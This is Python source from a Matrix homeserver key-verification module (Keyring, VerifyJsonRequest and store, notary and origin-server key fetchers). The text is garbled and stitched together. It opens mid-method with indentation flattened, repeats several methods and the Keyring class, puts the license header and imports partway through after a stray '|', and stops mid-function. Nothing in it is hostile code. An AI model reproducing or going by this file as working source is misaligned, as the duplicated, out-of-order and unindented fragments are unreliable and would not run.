# a list of VerifyJsonRequests which are awaiting a key lookup
key_lookups = []
handle = preserve_fn(_handle_key_deferred)
def process(verify_request):
"""Process an entry in the request list
Adds a key request to key_lookups, and returns a deferred which
will complete or fail (in the sentinel context) when verification completes.
"""
if not verify_request.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (verify_request.server_name,),
Codes.UNAUTHORIZED,
)
)
logger.debug(
"Verifying %s for %s with key_ids %s, min_validity %i",
verify_request.request_name,
verify_request.server_name,
verify_request.key_ids,
verify_request.minimum_valid_until_ts,
)
# add the key request to the queue, but don't start it off yet.
key_lookups.append(verify_request)
# now run _handle_key_deferred, which will wait for the key request
# to complete and then do the verification.
#
# We want _handle_key_request to log to the right context, so we
# wrap it with preserve_fn (aka run_in_background)
return handle(verify_request)
results = [process(r) for r in verify_requests]
if key_lookups:
run_in_background(self._start_key_lookups, key_lookups)
return results
async def _start_key_lookups(self, verify_requests):
"""Sets off the key fetches for each verify request
Once each fetch completes, verify_request.key_ready will be resolved.
Args:
verify_requests (List[VerifyJsonRequest]):
"""
try:
# map from server name to a set of outstanding request ids
server_to_request_ids = {}
for verify_request in verify_requests:
server_name = verify_request.server_name
request_id = id(verify_request)
server_to_request_ids.setdefault(server_name, set()).add(request_id)
# Wait for any previous lookups to complete before proceeding.
await self.wait_for_previous_lookups(server_to_request_ids.keys())
# take out a lock on each of the servers by sticking a Deferred in
# key_downloads
for server_name in server_to_request_ids.keys():
self.key_downloads[server_name] = defer.Deferred()
logger.debug("Got key lookup lock on %s", server_name)
# When we've finished fetching all the keys for a given server_name,
# drop the lock by resolving the deferred in key_downloads.
def drop_server_lock(server_name):
d = self.key_downloads.pop(server_name)
d.callback(None)
def lookup_done(res, verify_request):
server_name = verify_request.server_name
server_requests = server_to_request_ids[server_name]
server_requests.remove(id(verify_request))
# if there are no more requests for this server, we can drop the lock.
if not server_requests:
logger.debug("Releasing key lookup lock on %s", server_name)
drop_server_lock(server_name)
return res
for verify_request in verify_requests:
verify_request.key_ready.addBoth(lookup_done, verify_request)
# Actually start fetching keys.
self._get_server_verify_keys(verify_requests)
except Exception:
logger.exception("Error starting key lookups")
async def wait_for_previous_lookups(self, server_names) -> None:
    """Waits until no earlier key lookup is in flight for any given server.

    Args:
        server_names (Iterable[str]): servers which we are about to look up

    Returns:
        Resolves once all existing lookups for the given servers have
        completed. Follows the synapse rules of logcontext preservation.
    """
    attempt = 0
    while True:
        attempt += 1

        # Snapshot the (server, deferred) pairs for servers with an
        # in-progress download.
        pending = [
            (name, self.key_downloads[name])
            for name in server_names
            if name in self.key_downloads
        ]
        if not pending:
            return

        logger.info(
            "Waiting for existing lookups for %s to complete [loop %i]",
            [name for name, _ in pending],
            attempt,
        )

        # These deferreds are logcontext-agnostic, so wait on them from the
        # sentinel context.
        with PreserveLoggingContext():
            await defer.DeferredList(d for _, d in pending)
def _get_server_verify_keys(self, verify_requests):
    """Tries to find at least one key for each verify request

    For each verify_request, verify_request.key_ready is called back with
    params (server_name, key_id, VerifyKey) if a key is found, or errbacked
    with a SynapseError if none of the keys are found.

    Args:
        verify_requests (list[VerifyJsonRequest]): list of verify requests
    """
    # skip any requests whose key_ready has already fired
    remaining_requests = {rq for rq in verify_requests if not rq.key_ready.called}

    async def do_iterations():
        try:
            with Measure(self.clock, "get_server_verify_keys"):
                # try each fetcher in turn; each may satisfy some of the
                # outstanding requests and remove them from the set.
                for f in self._key_fetchers:
                    if not remaining_requests:
                        return
                    await self._attempt_key_fetches_with_fetcher(
                        f, remaining_requests
                    )

                # look for any requests which weren't satisfied
                while remaining_requests:
                    verify_request = remaining_requests.pop()
                    rq_str = (
                        "VerifyJsonRequest(server=%s, key_ids=%s, min_valid=%i)"
                        % (
                            verify_request.server_name,
                            verify_request.key_ids,
                            verify_request.minimum_valid_until_ts,
                        )
                    )

                    # If we run the errback immediately, it may cancel our
                    # loggingcontext while we are still in it, so instead we
                    # schedule it for the next time round the reactor.
                    #
                    # (this also ensures that we don't get a stack overflow if we
                    # has a massive queue of lookups waiting for this server).
                    self.clock.call_later(
                        0,
                        verify_request.key_ready.errback,
                        SynapseError(
                            401,
                            "Failed to find any key to satisfy %s" % (rq_str,),
                            Codes.UNAUTHORIZED,
                        ),
                    )
        except Exception as err:
            # we don't really expect to get here, because any errors should already
            # have been caught and logged. But if we do, let's log the error and make
            # sure that all of the deferreds are resolved.
            logger.error("Unexpected error in _get_server_verify_keys: %s", err)
            with PreserveLoggingContext():
                for verify_request in remaining_requests:
                    if not verify_request.key_ready.called:
                        verify_request.key_ready.errback(err)

    # kick off the lookup loop in the background; callers observe completion
    # via each request's key_ready deferred rather than a return value.
    run_in_background(do_iterations)
async def _attempt_key_fetches_with_fetcher(self, fetcher, remaining_requests):
    """Use a key fetcher to attempt to satisfy some key requests

    Args:
        fetcher (KeyFetcher): fetcher to use to fetch the keys
        remaining_requests (set[VerifyJsonRequest]): outstanding key requests.
            Any successfully-completed requests will be removed from the list.
    """
    # dict[str, dict[str, int]]: keys to fetch.
    # server_name -> key_id -> min_valid_ts
    missing_keys = defaultdict(dict)

    # Batch up the outstanding requests into a single query per server.
    for verify_request in remaining_requests:
        # any completed requests should already have been removed
        assert not verify_request.key_ready.called
        keys_for_server = missing_keys[verify_request.server_name]

        for key_id in verify_request.key_ids:
            # If we have several requests for the same key, then we only need to
            # request that key once, but we should do so with the greatest
            # min_valid_until_ts of the requests, so that we can satisfy all of
            # the requests.
            keys_for_server[key_id] = max(
                keys_for_server.get(key_id, -1),
                verify_request.minimum_valid_until_ts,
            )

    results = await fetcher.get_keys(missing_keys)

    completed = []
    for verify_request in remaining_requests:
        server_name = verify_request.server_name

        # see if any of the keys we got this time are sufficient to
        # complete this VerifyJsonRequest.
        result_keys = results.get(server_name, {})
        for key_id in verify_request.key_ids:
            fetch_key_result = result_keys.get(key_id)
            if not fetch_key_result:
                # we didn't get a result for this key
                continue

            if (
                fetch_key_result.valid_until_ts
                < verify_request.minimum_valid_until_ts
            ):
                # key was not valid at this point
                continue

            # we have a valid key for this request. If we run the callback
            # immediately, it may cancel our loggingcontext while we are still in
            # it, so instead we schedule it for the next time round the reactor.
            #
            # (this also ensures that we don't get a stack overflow if we had
            # a massive queue of lookups waiting for this server).
            logger.debug(
                "Found key %s:%s for %s",
                server_name,
                key_id,
                verify_request.request_name,
            )
            self.clock.call_later(
                0,
                verify_request.key_ready.callback,
                (server_name, key_id, fetch_key_result.verify_key),
            )
            completed.append(verify_request)
            break

    # mutate the caller's set in place, as documented above
    remaining_requests.difference_update(completed)
class KeyFetcher:
    """Abstract source of server signing keys.

    Concrete subclasses obtain keys from a particular backend: the local
    datastore, a trusted notary ("perspectives") server, or the origin
    server itself.
    """

    async def get_keys(self, keys_to_fetch):
        """Attempt to fetch a batch of signing keys.

        Args:
            keys_to_fetch (dict[str, dict[str, int]]):
                the keys to be fetched, as a map of
                server_name -> key_id -> minimum valid-until timestamp

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
                map from server_name -> key_id -> FetchKeyResult
        """
        raise NotImplementedError
class StoreKeyFetcher(KeyFetcher):
    """KeyFetcher impl which fetches keys from our data store"""

    def __init__(self, hs):
        self.store = hs.get_datastore()

    async def get_keys(self, keys_to_fetch):
        """see KeyFetcher.get_keys"""
        # Flatten the nested request map into (server_name, key_id) pairs.
        # Note that the per-key minimum-validity values are not passed on to
        # the store.
        wanted = [
            (server_name, key_id)
            for server_name, server_keys in keys_to_fetch.items()
            for key_id in server_keys
        ]

        fetched = await self.store.get_server_verify_keys(wanted)

        # Re-nest the flat result into server_name -> key_id -> key.
        results = {}
        for (server_name, key_id), key in fetched.items():
            results.setdefault(server_name, {})[key_id] = key
        return results
class BaseV2KeyFetcher:
    """Shared machinery for fetchers which process v2 'Server Keys' responses."""

    def __init__(self, hs):
        self.store = hs.get_datastore()
        self.config = hs.get_config()

    async def process_v2_response(self, from_server, response_json, time_added_ms):
        """Parse a 'Server Keys' structure from the result of a /key request

        This is used to parse either the entirety of the response from
        GET /_matrix/key/v2/server, or a single entry from the list returned by
        POST /_matrix/key/v2/query.

        Checks that each signature in the response that claims to come from the origin
        server is valid, and that there is at least one such signature.

        Stores the json in server_keys_json so that it can be used for future responses
        to /_matrix/key/v2/query.

        Args:
            from_server (str): the name of the server producing this result: either
                the origin server for a /_matrix/key/v2/server request, or the notary
                for a /_matrix/key/v2/query.

            response_json (dict): the json-decoded Server Keys response object

            time_added_ms (int): the timestamp to record in server_keys_json

        Returns:
            Deferred[dict[str, FetchKeyResult]]: map from key_id to result object

        Raises:
            KeyLookupError: if the response is not signed by the origin server
                with a key present in its own "verify_keys".
        """
        ts_valid_until_ms = response_json["valid_until_ts"]

        # start by extracting the keys from the response, since they may be required
        # to validate the signature on the response.
        verify_keys = {}
        for key_id, key_data in response_json["verify_keys"].items():
            # silently skip key ids whose signing algorithm we don't support
            if is_signing_algorithm_supported(key_id):
                key_base64 = key_data["key"]
                key_bytes = decode_base64(key_base64)
                verify_key = decode_verify_key_bytes(key_id, key_bytes)
                verify_keys[key_id] = FetchKeyResult(
                    verify_key=verify_key, valid_until_ts=ts_valid_until_ms
                )

        server_name = response_json["server_name"]
        verified = False
        for key_id in response_json["signatures"].get(server_name, {}):
            key = verify_keys.get(key_id)
            if not key:
                # the key may not be present in verify_keys if:
                #  * we got the key from the notary server, and:
                #  * the key belongs to the notary server, and:
                #  * the notary server is using a different key to sign notary
                #    responses.
                continue

            # raises SignatureVerifyException on a bad signature
            verify_signed_json(response_json, server_name, key.verify_key)
            verified = True
            break

        if not verified:
            raise KeyLookupError(
                "Key response for %s is not signed by the origin server"
                % (server_name,)
            )

        # expired keys are added to the result *after* the signature check:
        # they may not be used to validate this response, but callers may
        # still need them to check old events.
        for key_id, key_data in response_json["old_verify_keys"].items():
            if is_signing_algorithm_supported(key_id):
                key_base64 = key_data["key"]
                key_bytes = decode_base64(key_base64)
                verify_key = decode_verify_key_bytes(key_id, key_bytes)
                verify_keys[key_id] = FetchKeyResult(
                    verify_key=verify_key, valid_until_ts=key_data["expired_ts"]
                )

        key_json_bytes = encode_canonical_json(response_json)

        # persist the raw response once per key id, in parallel
        await make_deferred_yieldable(
            defer.gatherResults(
                [
                    run_in_background(
                        self.store.store_server_keys_json,
                        server_name=server_name,
                        key_id=key_id,
                        from_server=from_server,
                        ts_now_ms=time_added_ms,
                        ts_expires_ms=ts_valid_until_ms,
                        key_json_bytes=key_json_bytes,
                    )
                    for key_id in verify_keys
                ],
                consumeErrors=True,
            ).addErrback(unwrapFirstError)
        )

        return verify_keys
class PerspectivesKeyFetcher(BaseV2KeyFetcher):
    """KeyFetcher impl which fetches keys from the "perspectives" servers"""

    def __init__(self, hs):
        super().__init__(hs)
        self.clock = hs.get_clock()
        self.client = hs.get_http_client()
        # the notary servers configured for this homeserver
        self.key_servers = self.config.key_servers

    async def get_keys(self, keys_to_fetch):
        """see KeyFetcher.get_keys"""

        async def get_key(key_server):
            # query a single notary; returns {} on any failure so that one
            # bad notary does not fail the whole batch.
            try:
                result = await self.get_server_verify_key_v2_indirect(
                    keys_to_fetch, key_server
                )
                return result
            except KeyLookupError as e:
                logger.warning(
                    "Key lookup failed from %r: %s", key_server.server_name, e
                )
            except Exception as e:
                logger.exception(
                    "Unable to get key from %r: %s %s",
                    key_server.server_name,
                    type(e).__name__,
                    str(e),
                )

            return {}

        # query all configured notaries in parallel
        results = await make_deferred_yieldable(
            defer.gatherResults(
                [run_in_background(get_key, server) for server in self.key_servers],
                consumeErrors=True,
            ).addErrback(unwrapFirstError)
        )

        # merge the per-notary results; later notaries overwrite earlier ones
        # for the same (server_name, key_id).
        union_of_keys = {}
        for result in results:
            for server_name, keys in result.items():
                union_of_keys.setdefault(server_name, {}).update(keys)

        return union_of_keys

    async def get_server_verify_key_v2_indirect(self, keys_to_fetch, key_server):
        """Fetch keys for a number of servers via a single notary server.

        Args:
            keys_to_fetch (dict[str, dict[str, int]]):
                the keys to be fetched. server_name -> key_id -> min_valid_ts

            key_server (synapse.config.key.TrustedKeyServer): notary server to query for
                the keys

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult]]: map
                from server_name -> key_id -> FetchKeyResult

        Raises:
            KeyLookupError if there was an error processing the entire response from
                the server
        """
        perspective_name = key_server.server_name
        logger.info(
            "Requesting keys %s from notary server %s",
            keys_to_fetch.items(),
            perspective_name,
        )

        try:
            query_response = await self.client.post_json(
                destination=perspective_name,
                path="/_matrix/key/v2/query",
                data={
                    "server_keys": {
                        server_name: {
                            key_id: {"minimum_valid_until_ts": min_valid_ts}
                            for key_id, min_valid_ts in server_keys.items()
                        }
                        for server_name, server_keys in keys_to_fetch.items()
                    }
                },
            )
        except (NotRetryingDestination, RequestSendFailed) as e:
            # these both have str() representations which we can't really improve upon
            raise KeyLookupError(str(e))
        except HttpResponseException as e:
            raise KeyLookupError("Remote server returned an error: %s" % (e,))

        keys = {}
        added_keys = []

        time_now_ms = self.clock.time_msec()

        for response in query_response["server_keys"]:
            # do this first, so that we can give useful errors thereafter
            server_name = response.get("server_name")
            if not isinstance(server_name, str):
                raise KeyLookupError(
                    "Malformed response from key notary server %s: invalid server_name"
                    % (perspective_name,)
                )

            try:
                # check the notary's signature before trusting the entry
                self._validate_perspectives_response(key_server, response)

                processed_response = await self.process_v2_response(
                    perspective_name, response, time_added_ms=time_now_ms
                )
            except KeyLookupError as e:
                logger.warning(
                    "Error processing response from key notary server %s for origin "
                    "server %s: %s",
                    perspective_name,
                    server_name,
                    e,
                )
                # we continue to process the rest of the response
                continue

            added_keys.extend(
                (server_name, key_id, key) for key_id, key in processed_response.items()
            )
            keys.setdefault(server_name, {}).update(processed_response)

        await self.store.store_server_verify_keys(
            perspective_name, time_now_ms, added_keys
        )

        return keys

    def _validate_perspectives_response(self, key_server, response):
        """Optionally check the signature on the result of a /key/query request

        Args:
            key_server (synapse.config.key.TrustedKeyServer): the notary server that
                produced this result

            response (dict): the json-decoded Server Keys response object

        Raises:
            KeyLookupError: if the response is not signed with a key we know
                to belong to the notary server.
        """
        perspective_name = key_server.server_name
        perspective_keys = key_server.verify_keys

        if perspective_keys is None:
            # signature checking is disabled on this server
            return

        if (
            "signatures" not in response
            or perspective_name not in response["signatures"]
        ):
            raise KeyLookupError("Response not signed by the notary server")

        verified = False
        for key_id in response["signatures"][perspective_name]:
            if key_id in perspective_keys:
                # raises SignatureVerifyException on a bad signature
                verify_signed_json(response, perspective_name, perspective_keys[key_id])
                verified = True

        if not verified:
            raise KeyLookupError(
                "Response not signed with a known key: signed with: %r, known keys: %r"
                % (
                    list(response["signatures"][perspective_name].keys()),
                    list(perspective_keys.keys()),
                )
            )
class ServerKeyFetcher(BaseV2KeyFetcher):
    """KeyFetcher impl which fetches keys from the origin servers"""

    def __init__(self, hs):
        super().__init__(hs)
        self.clock = hs.get_clock()
        self.client = hs.get_http_client()

    async def get_keys(self, keys_to_fetch):
        """Fetch keys by asking each origin server directly.

        Args:
            keys_to_fetch (dict[str, iterable[str]]):
                the keys to be fetched. server_name -> key_ids

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
                map from server_name -> key_id -> FetchKeyResult
        """
        results = {}

        async def get_key(key_to_fetch_item):
            # fetch one server's keys; failures are logged and that server is
            # simply omitted from the results.
            server_name, key_ids = key_to_fetch_item
            try:
                keys = await self.get_server_verify_key_v2_direct(server_name, key_ids)
                results[server_name] = keys
            except KeyLookupError as e:
                logger.warning(
                    "Error looking up keys %s from %s: %s", key_ids, server_name, e
                )
            except Exception:
                logger.exception("Error getting keys %s from %s", key_ids, server_name)

        await yieldable_gather_results(get_key, keys_to_fetch.items())
        return results

    async def get_server_verify_key_v2_direct(self, server_name, key_ids):
        """Fetch the given key ids from a single origin server.

        Args:
            server_name (str):
            key_ids (iterable[str]):

        Returns:
            dict[str, FetchKeyResult]: map from key ID to lookup result

        Raises:
            KeyLookupError if there was a problem making the lookup
        """
        keys = {}  # type: dict[str, FetchKeyResult]

        for requested_key_id in key_ids:
            # we may have found this key as a side-effect of asking for another.
            if requested_key_id in keys:
                continue

            time_now_ms = self.clock.time_msec()
            try:
                response = await self.client.get_json(
                    destination=server_name,
                    path="/_matrix/key/v2/server/"
                    + urllib.parse.quote(requested_key_id),
                    ignore_backoff=True,
                    # we only give the remote server 10s to respond. It should be an
                    # easy request to handle, so if it doesn't reply within 10s, it's
                    # probably not going to.
                    #
                    # Furthermore, when we are acting as a notary server, we cannot
                    # wait all day for all of the origin servers, as the requesting
                    # server will otherwise time out before we can respond.
                    #
                    # (Note that get_json may make 4 attempts, so this can still take
                    # almost 45 seconds to fetch the headers, plus up to another 60s to
                    # read the response).
                    timeout=10000,
                )
            except (NotRetryingDestination, RequestSendFailed) as e:
                # these both have str() representations which we can't really improve
                # upon
                raise KeyLookupError(str(e))
            except HttpResponseException as e:
                raise KeyLookupError("Remote server returned an error: %s" % (e,))

            # sanity-check that the response is for the server we asked about
            if response["server_name"] != server_name:
                raise KeyLookupError(
                    "Expected a response for server %r not %r"
                    % (server_name, response["server_name"])
                )

            response_keys = await self.process_v2_response(
                from_server=server_name,
                response_json=response,
                time_added_ms=time_now_ms,
            )
            await self.store.store_server_verify_keys(
                server_name,
                time_now_ms,
                ((server_name, key_id, key) for key_id, key in response_keys.items()),
            )
            keys.update(response_keys)

        return keys
async def _handle_key_deferred(verify_request) -> None:
    """Wait for a verify key to arrive, then check the request's signature.

    Args:
        verify_request (VerifyJsonRequest): the pending verification

    Raises:
        SynapseError: if the signature check fails once a key is available
    """
    server_name = verify_request.server_name

    # key_ready runs its callbacks with no logcontext, so drop into the
    # sentinel context while we wait on it.
    with PreserveLoggingContext():
        _, key_id, verify_key = await verify_request.key_ready

    try:
        verify_signed_json(verify_request.json_object, server_name, verify_key)
    except SignatureVerifyException as e:
        logger.debug(
            "Error verifying signature for %s:%s:%s with key %s: %s",
            server_name,
            verify_key.alg,
            verify_key.version,
            encode_verify_key_base64(verify_key),
            str(e),
        )
        raise SynapseError(
            401,
            "Invalid signature for server %s with key %s:%s: %s"
            % (server_name, verify_key.alg, verify_key.version, str(e)),
            Codes.UNAUTHORIZED,
        )
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017, 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from collections import defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
# Module-level logger for key-fetching / signature-verification diagnostics.
logger = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class VerifyJsonRequest:
    """
    A request to verify a JSON object.

    Attributes:
        server_name(str): The name of the server to verify against.

        key_ids(set[str]): The set of key_ids to that could be used to verify the
            JSON object

        json_object(dict): The JSON object to verify.

        minimum_valid_until_ts (int): time at which we require the signing key to
            be valid. (0 implies we don't care)

        key_ready (Deferred[str, str, nacl.signing.VerifyKey]):
            A deferred (server_name, key_id, verify_key) tuple that resolves when
            a verify key has been fetched. The deferreds' callbacks are run with no
            logcontext.

            If we are unable to find a key which satisfies the request, the deferred
            errbacks with an M_UNAUTHORIZED SynapseError.
    """

    server_name = attr.ib()
    json_object = attr.ib()
    minimum_valid_until_ts = attr.ib()
    request_name = attr.ib()
    # derived from json_object/server_name in __attrs_post_init__, so it is
    # excluded from the generated __init__.
    key_ids = attr.ib(init=False)
    key_ready = attr.ib(default=attr.Factory(defer.Deferred))

    def __attrs_post_init__(self):
        # pre-compute the key ids which signed json_object on behalf of
        # server_name: these are the verification candidates.
        self.key_ids = signature_ids(self.json_object, self.server_name)
class KeyLookupError(ValueError):
    """Raised when a remote server's signing key could not be fetched or processed."""
class Keyring:
    """Verifies signatures on JSON objects signed by remote homeservers.

    Keys are obtained via the configured list of KeyFetchers (by default the
    local store, the notary servers, and the origin servers). Concurrent
    lookups for the same server are serialised via per-server Deferred locks
    in `key_downloads`.
    """

    def __init__(self, hs, key_fetchers=None):
        self.clock = hs.get_clock()

        if key_fetchers is None:
            # default fetcher chain, tried in order: cheapest first.
            key_fetchers = (
                StoreKeyFetcher(hs),
                PerspectivesKeyFetcher(hs),
                ServerKeyFetcher(hs),
            )
        self._key_fetchers = key_fetchers

        # map from server name to Deferred. Has an entry for each server with
        # an ongoing key download; the Deferred completes once the download
        # completes.
        #
        # These are regular, logcontext-agnostic Deferreds.
        self.key_downloads = {}

    def verify_json_for_server(
        self, server_name, json_object, validity_time, request_name
    ):
        """Verify that a JSON object has been signed by a given server

        Args:
            server_name (str): name of the server which must have signed this object

            json_object (dict): object to be checked

            validity_time (int): timestamp at which we require the signing key to
                be valid. (0 implies we don't care)

            request_name (str): an identifier for this json object (eg, an event id)
                for logging.

        Returns:
            Deferred[None]: completes if the the object was correctly signed, otherwise
                errbacks with an error
        """
        req = VerifyJsonRequest(server_name, json_object, validity_time, request_name)
        requests = (req,)
        return make_deferred_yieldable(self._verify_objects(requests)[0])

    def verify_json_objects_for_server(self, server_and_json):
        """Bulk verifies signatures of json objects, bulk fetching keys as
        necessary.

        Args:
            server_and_json (iterable[Tuple[str, dict, int, str]):
                Iterable of (server_name, json_object, validity_time, request_name)
                tuples.

                validity_time is a timestamp at which the signing key must be
                valid.

                request_name is an identifier for this json object (eg, an event id)
                for logging.

        Returns:
            List<Deferred[None]>: for each input triplet, a deferred indicating success
                or failure to verify each json object's signature for the given
                server_name. The deferreds run their callbacks in the sentinel
                logcontext.
        """
        return self._verify_objects(
            VerifyJsonRequest(server_name, json_object, validity_time, request_name)
            for server_name, json_object, validity_time, request_name in server_and_json
        )

    def _verify_objects(self, verify_requests):
        """Does the work of verify_json_[objects_]for_server

        Args:
            verify_requests (iterable[VerifyJsonRequest]):
                Iterable of verification requests.

        Returns:
            List<Deferred[None]>: for each input item, a deferred indicating success
                or failure to verify each json object's signature for the given
                server_name. The deferreds run their callbacks in the sentinel
                logcontext.
        """
        # a list of VerifyJsonRequests which are awaiting a key lookup
        key_lookups = []
        handle = preserve_fn(_handle_key_deferred)

        def process(verify_request):
            """Process an entry in the request list

            Adds a key request to key_lookups, and returns a deferred which
            will complete or fail (in the sentinel context) when verification completes.
            """
            if not verify_request.key_ids:
                # the object carries no signature for this server at all:
                # fail immediately without a key lookup.
                return defer.fail(
                    SynapseError(
                        400,
                        "Not signed by %s" % (verify_request.server_name,),
                        Codes.UNAUTHORIZED,
                    )
                )

            logger.debug(
                "Verifying %s for %s with key_ids %s, min_validity %i",
                verify_request.request_name,
                verify_request.server_name,
                verify_request.key_ids,
                verify_request.minimum_valid_until_ts,
            )

            # add the key request to the queue, but don't start it off yet.
            key_lookups.append(verify_request)

            # now run _handle_key_deferred, which will wait for the key request
            # to complete and then do the verification.
            #
            # We want _handle_key_request to log to the right context, so we
            # wrap it with preserve_fn (aka run_in_background)
            return handle(verify_request)

        results = [process(r) for r in verify_requests]

        if key_lookups:
            run_in_background(self._start_key_lookups, key_lookups)

        return results

    async def _start_key_lookups(self, verify_requests):
        """Sets off the key fetches for each verify request

        Once each fetch completes, verify_request.key_ready will be resolved.

        Args:
            verify_requests (List[VerifyJsonRequest]):
        """
        try:
            # map from server name to a set of outstanding request ids
            server_to_request_ids = {}

            for verify_request in verify_requests:
                server_name = verify_request.server_name
                request_id = id(verify_request)
                server_to_request_ids.setdefault(server_name, set()).add(request_id)

            # Wait for any previous lookups to complete before proceeding.
            await self.wait_for_previous_lookups(server_to_request_ids.keys())

            # take out a lock on each of the servers by sticking a Deferred in
            # key_downloads
            for server_name in server_to_request_ids.keys():
                self.key_downloads[server_name] = defer.Deferred()
                logger.debug("Got key lookup lock on %s", server_name)

            # When we've finished fetching all the keys for a given server_name,
            # drop the lock by resolving the deferred in key_downloads.
            def drop_server_lock(server_name):
                d = self.key_downloads.pop(server_name)
                d.callback(None)

            def lookup_done(res, verify_request):
                # pass-through callback: releases the per-server lock once the
                # last outstanding request for that server has completed.
                server_name = verify_request.server_name
                server_requests = server_to_request_ids[server_name]
                server_requests.remove(id(verify_request))

                # if there are no more requests for this server, we can drop the lock.
                if not server_requests:
                    logger.debug("Releasing key lookup lock on %s", server_name)
                    drop_server_lock(server_name)

                return res

            for verify_request in verify_requests:
                verify_request.key_ready.addBoth(lookup_done, verify_request)

            # Actually start fetching keys.
            self._get_server_verify_keys(verify_requests)
        except Exception:
            # run via run_in_background, so there is nobody to report a
            # failure to: just log it.
            logger.exception("Error starting key lookups")

    async def wait_for_previous_lookups(self, server_names) -> None:
        """Waits for any previous key lookups for the given servers to finish.

        Args:
            server_names (Iterable[str]): list of servers which we want to look up

        Returns:
            Resolves once all key lookups for the given servers have
                completed. Follows the synapse rules of logcontext preservation.
        """
        loop_count = 1
        while True:
            wait_on = [
                (server_name, self.key_downloads[server_name])
                for server_name in server_names
                if server_name in self.key_downloads
            ]
            if not wait_on:
                break
            logger.info(
                "Waiting for existing lookups for %s to complete [loop %i]",
                [w[0] for w in wait_on],
                loop_count,
            )
            # the deferreds in key_downloads are logcontext-agnostic, so wait
            # on them from the sentinel context.
            with PreserveLoggingContext():
                await defer.DeferredList((w[1] for w in wait_on))

            loop_count += 1

    def _get_server_verify_keys(self, verify_requests):
        """Tries to find at least one key for each verify request

        For each verify_request, verify_request.key_ready is called back with
        params (server_name, key_id, VerifyKey) if a key is found, or errbacked
        with a SynapseError if none of the keys are found.

        Args:
            verify_requests (list[VerifyJsonRequest]): list of verify requests
        """
        # skip any requests whose key_ready has already fired
        remaining_requests = {rq for rq in verify_requests if not rq.key_ready.called}

        async def do_iterations():
            try:
                with Measure(self.clock, "get_server_verify_keys"):
                    # try each fetcher in turn; each may satisfy some of the
                    # outstanding requests.
                    for f in self._key_fetchers:
                        if not remaining_requests:
                            return
                        await self._attempt_key_fetches_with_fetcher(
                            f, remaining_requests
                        )

                    # look for any requests which weren't satisfied
                    while remaining_requests:
                        verify_request = remaining_requests.pop()
                        rq_str = (
                            "VerifyJsonRequest(server=%s, key_ids=%s, min_valid=%i)"
                            % (
                                verify_request.server_name,
                                verify_request.key_ids,
                                verify_request.minimum_valid_until_ts,
                            )
                        )

                        # If we run the errback immediately, it may cancel our
                        # loggingcontext while we are still in it, so instead we
                        # schedule it for the next time round the reactor.
                        #
                        # (this also ensures that we don't get a stack overflow if we
                        # has a massive queue of lookups waiting for this server).
                        self.clock.call_later(
                            0,
                            verify_request.key_ready.errback,
                            SynapseError(
                                401,
                                "Failed to find any key to satisfy %s" % (rq_str,),
                                Codes.UNAUTHORIZED,
                            ),
                        )
            except Exception as err:
                # we don't really expect to get here, because any errors should already
                # have been caught and logged. But if we do, let's log the error and make
                # sure that all of the deferreds are resolved.
                logger.error("Unexpected error in _get_server_verify_keys: %s", err)
                with PreserveLoggingContext():
                    for verify_request in remaining_requests:
                        if not verify_request.key_ready.called:
                            verify_request.key_ready.errback(err)

        # kick off the lookup loop in the background; completion is observed
        # via each request's key_ready deferred.
        run_in_background(do_iterations)

    async def _attempt_key_fetches_with_fetcher(self, fetcher, remaining_requests):
        """Use a key fetcher to attempt to satisfy some key requests

        Args:
            fetcher (KeyFetcher): fetcher to use to fetch the keys
            remaining_requests (set[VerifyJsonRequest]): outstanding key requests.
                Any successfully-completed requests will be removed from the list.
        """
        # dict[str, dict[str, int]]: keys to fetch.
        # server_name -> key_id -> min_valid_ts
        missing_keys = defaultdict(dict)

        for verify_request in remaining_requests:
            # any completed requests should already have been removed
            assert not verify_request.key_ready.called
            keys_for_server = missing_keys[verify_request.server_name]

            for key_id in verify_request.key_ids:
                # If we have several requests for the same key, then we only need to
                # request that key once, but we should do so with the greatest
                # min_valid_until_ts of the requests, so that we can satisfy all of
                # the requests.
                keys_for_server[key_id] = max(
                    keys_for_server.get(key_id, -1),
                    verify_request.minimum_valid_until_ts,
                )

        results = await fetcher.get_keys(missing_keys)

        completed = []
        for verify_request in remaining_requests:
            server_name = verify_request.server_name

            # see if any of the keys we got this time are sufficient to
            # complete this VerifyJsonRequest.
            result_keys = results.get(server_name, {})
            for key_id in verify_request.key_ids:
                fetch_key_result = result_keys.get(key_id)
                if not fetch_key_result:
                    # we didn't get a result for this key
                    continue

                if (
                    fetch_key_result.valid_until_ts
                    < verify_request.minimum_valid_until_ts
                ):
                    # key was not valid at this point
                    continue

                # we have a valid key for this request. If we run the callback
                # immediately, it may cancel our loggingcontext while we are still in
                # it, so instead we schedule it for the next time round the reactor.
                #
                # (this also ensures that we don't get a stack overflow if we had
                # a massive queue of lookups waiting for this server).
                logger.debug(
                    "Found key %s:%s for %s",
                    server_name,
                    key_id,
                    verify_request.request_name,
                )
                self.clock.call_later(
                    0,
                    verify_request.key_ready.callback,
                    (server_name, key_id, fetch_key_result.verify_key),
                )
                completed.append(verify_request)
                break

        # mutate the caller's set in place, as documented above
